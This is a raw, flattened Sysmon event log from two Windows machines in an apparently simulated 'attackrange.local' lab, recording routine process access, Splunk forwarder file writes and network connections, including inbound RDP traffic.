09:03:29.369{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977062Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.369{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977061Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.369{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977060Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.369{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-88E1-6151-8D79-00000000FD01}2376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977059Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.354{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88E1-6151-8D79-00000000FD01}2376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977058Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.354{69CF5F33-88E1-6151-8D79-00000000FD01}2376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000977075Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.429{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49399-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977074Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:30.650{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DC0B7F9A24CB7BB3F5ADD62B8955ADB,SHA256=43D8B350476E174EF3D477360C29ADF0640EC1BE1F6FB3723ACB659FA29014A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048430Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:28.902{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53234-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001048429Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:28.518{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49411-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048428Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:30.296{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=620D7A9B66A2403C0C271BBF427600C5,SHA256=F73B2AD91BB9143B74328B59E9FEEEB6BDACE1F50FEEE8337424ABD278582A65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977073Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:30.260{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F81472974BC94CD6A8E94C30B38246E7,SHA256=0EB18313C270A3F810BC4EE1DB1EF1DF6121E9FF80E85715D1BD4A54C7D2E471,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048427Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:30.259{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2B55B3E7521D24D121889BE6DCDDE99A,SHA256=34587DB94449ABEC9E6D4E21088888E834A62DEB75448493B39CA1D031F091E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048426Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:30.259{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2B9FFFD39FE447C8C264F4A6D3AB426,SHA256=0A400668DF1973124E96884F9EB649A4B7CD7B887AD485AAE8AF5CF0DA64B9F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977076Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:31.885{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE7AB9D3DE7E4FA2CFE813CEAF4A92D9,SHA256=7923A7FD7666E9E809C0D3ACD50112BA54A800EDB53E2F7983FEF2DDAC2168FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048431Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:31.311{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=737B4E8CFA3E8C828912196E78E6C733,SHA256=5154FBDE57AA79309438755EEF56B94C44E1D94EEC1DD6DB1B702CA32C19BCFB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048435Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:30.984{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60841-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001048434Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:32.660{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048433Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:32.598{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2B55B3E7521D24D121889BE6DCDDE99A,SHA256=34587DB94449ABEC9E6D4E21088888E834A62DEB75448493B39CA1D031F091E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048432Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:32.314{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFEB240A1E35290399730B9C15602A2D,SHA256=162ACD66C15658044F51AF421815E1D11B5F5D65CF8F9DAE8AB0DF0731507D07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977077Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:32.479{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=88A5201975FF8D756DC52C9621C992F7,SHA256=272386CD4EA52FC008B9224FD86A24F0AC383ED0194302C7EBA1B1DB134E6885,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048436Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:33.329{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=907397DF3C78BFDF9AE55F121287D03E,SHA256=07B6691631F0FE9544494D915B86370E1C0169322F542C389714E4F675D1F944,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977080Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:33.244{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=514115CF6FFA4DEAB8C77A05940DD7AB,SHA256=9F44AEF968494419AA41AB1A5A1F3A7C8CC04A4E75A566A48E1A7CAD9F27B268,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977079Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:29.905{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59283-false10.0.1.12-8000- 23542300x8000000000000000977078Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:33.057{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1671C18494D66BA8FCE0DF529014D6BB,SHA256=7A59A00B43EB1D0481BCEA6424F91D6466AC39B55BDDAF6045E8415229125800,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048437Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:34.359{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEE81C56B410D861D0BE7A5A24D812CB,SHA256=4B3DEE49DE7879EA40229132D8FEE02A5C1415A5AAC862BE854F4F3370CD1796,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977082Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:30.179{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-20855-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977081Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:34.119{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31AE0C9212E5D1D5015A7A68FF512162,SHA256=A9E28B6B00EDB2E66536F8D65042E03D52A456F25CFF09C70C26E5617FDB049A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048438Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:35.527{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93E01435452C118C63D5AB735F33F14D,SHA256=B7AF515D788B70D5BF1D5C6CA7D9A8980609C0BCFB8E538361B4D0ABCBC30AD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977086Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:35.244{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4837728003770DEBC7F66303ED04FDFA,SHA256=DC3BF45BBA1C02FA1F9B1E43B988466DA3AACD87879A1FBA1CFD1BA0BCFC4070,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977085Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:32.409{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52442-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977084Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:32.242{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-32855-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977083Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:35.135{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4267BC847CD001A4B492ACFA47ABAD49,SHA256=FCB89483EC97D0A9E529BE43DCC0301C336F3763CB449E1B3BCC5677C86BAA50,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048441Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:34.766{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53235-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048440Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:36.597{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F524D105A21847208736F22A96B0842,SHA256=0AB2669EF4AC633D04E3233ABA07C4F54AC983F17E4B8E5D49C00CE52AF1D783,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977087Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:36.135{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88E9686A0A3215A6D58B0021980B35E4,SHA256=2415120CD6426C6094F9ABA74CC1181973B56D400C0D33074D6202DD03E7DD24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048439Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:36.442{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048443Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:36.118{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53236-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001048442Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:37.612{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC44E0DC13A6FBE2BA8814F1DDBFBD65,SHA256=3333B0EAFC33583DA25479BA155ADD0CB653B3C8FBEE621D819AC5318CCD39F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977102Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.760{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88E9-6151-8E79-00000000FD01}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977101Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.760{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977100Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.760{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977099Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.760{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977098Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.760{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977097Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 